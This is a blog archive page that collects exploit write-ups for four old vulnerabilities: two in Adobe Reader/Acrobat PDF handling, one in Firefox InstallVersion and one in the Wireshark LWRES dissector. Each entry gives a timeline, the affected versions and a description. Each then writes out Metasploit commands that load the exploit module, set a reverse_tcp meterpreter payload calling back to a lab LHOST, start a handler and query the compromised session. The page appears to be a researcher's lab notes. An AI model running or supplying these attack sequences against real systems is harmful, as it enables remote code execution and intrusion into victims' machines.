Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2009-3953 : Adobe Acrobat U3D CLODProgressiveMeshDeclaration Array Overrun

Timeline :

Vulnerability provided to Secunia by Felipe Andres Manzano for versions prior to 9.2
Vulnerability provided to Secunia by Parvez Anwar for version 9.2
Vulnerabilities provided by Secunia to the vendor
Metasploit PoC provided by jduck on 2009-11-25
Coordinated advisory release on 2010-01-12 !

    PoC provided by :

Felipe Andres Manzano
jduck

    Reference(s) :

CVE-2009-3953

    Affected version(s) :

Adobe Reader and Acrobat Professional prior to version 9.3
Acrobat prior to version 8.2

    Tested on Windows XP SP3 with :

    Adobe Reader 9.0.0

    Description :

This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include those prior to 7.1.4, prior to 8.2, and prior to 9.3. By creating a specially crafted PDF that contains malformed U3D data, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_u3d_meshdecl
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0188 : Adobe Acrobat Bundled LibTIFF Integer Overflow

Timeline :

Vulnerability reported by Microsoft to the vendor
Coordinated public disclosure on 2010-02-16
PoC provided by villy on 2010-03-12
Metasploit PoC provided by jduck on 2010-03-16
PoC provided by villy on Exploit-DB on 2010-03-17

    PoC provided by :

Microsoft
villy
jduck

    Reference(s) :

CVE-2010-0188

    Affected version(s) :

Adobe Reader 9.3 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3 and earlier versions for Windows and Macintosh

    Tested on Windows XP SP3 with :

    Adobe Reader 9.3.0

    Description :

This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.

    Commands :

use exploit/windows/fileformat/adobe_libtiff
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2005-2265 : Mozilla Suite/Firefox InstallVersion compareTo() Code Execution

Timeline :

Vulnerability reported to the vendor by Aviv Raff on 2005-05-28
Version 1.0.5 of Mozilla Firefox & 1.7.10 of Mozilla Suite released on 2005-07-12
Vulnerability & PoC disclosure by Aviv Raff on 2005-07-13

    PoC provided by :

hdm
Aviv Raff

    Reference(s) :

CVE-2005-2265
MFSA 2005-50

    Affected version(s) :

Mozilla Firefox prior to version 1.0.5
Mozilla Suite prior to version 1.7.10

    Tested on Windows XP SP3 with :

    Mozilla Firefox 1.0.4

    Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff’s HTML PoC.

    Commands :

use exploit/multi/browser/mozilla_compareto
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0304 : Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow

Timeline :

Vulnerability reported to the vendor by babi
Coordinated vulnerability disclosure on 2010-01-27
Version 1.2.6 released on 2010-01-27
Exploit-DB PoC provided by babi on 2010-01-29
Metasploit PoC provided on 2010-02-01

    PoC provided by :

babi
jduck
redsand

    Reference(s) :

CVE-2010-0304
EDB-ID-11288
wnpa-sec-2010-02

    Affected version(s) :

0.9.15 to 1.0.10, 1.2.0 to 1.2.5 included

    Tested on Windows XP SP3 with :

    wireshark/tshark 1.2.5

    Description :

The LWRES dissector in Wireshark versions 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug was found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.

    Commands :

use exploit/multi/misc/wireshark_lwres_getaddrbyname
set RHOST 192.168.178.41
set TARGET 4
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig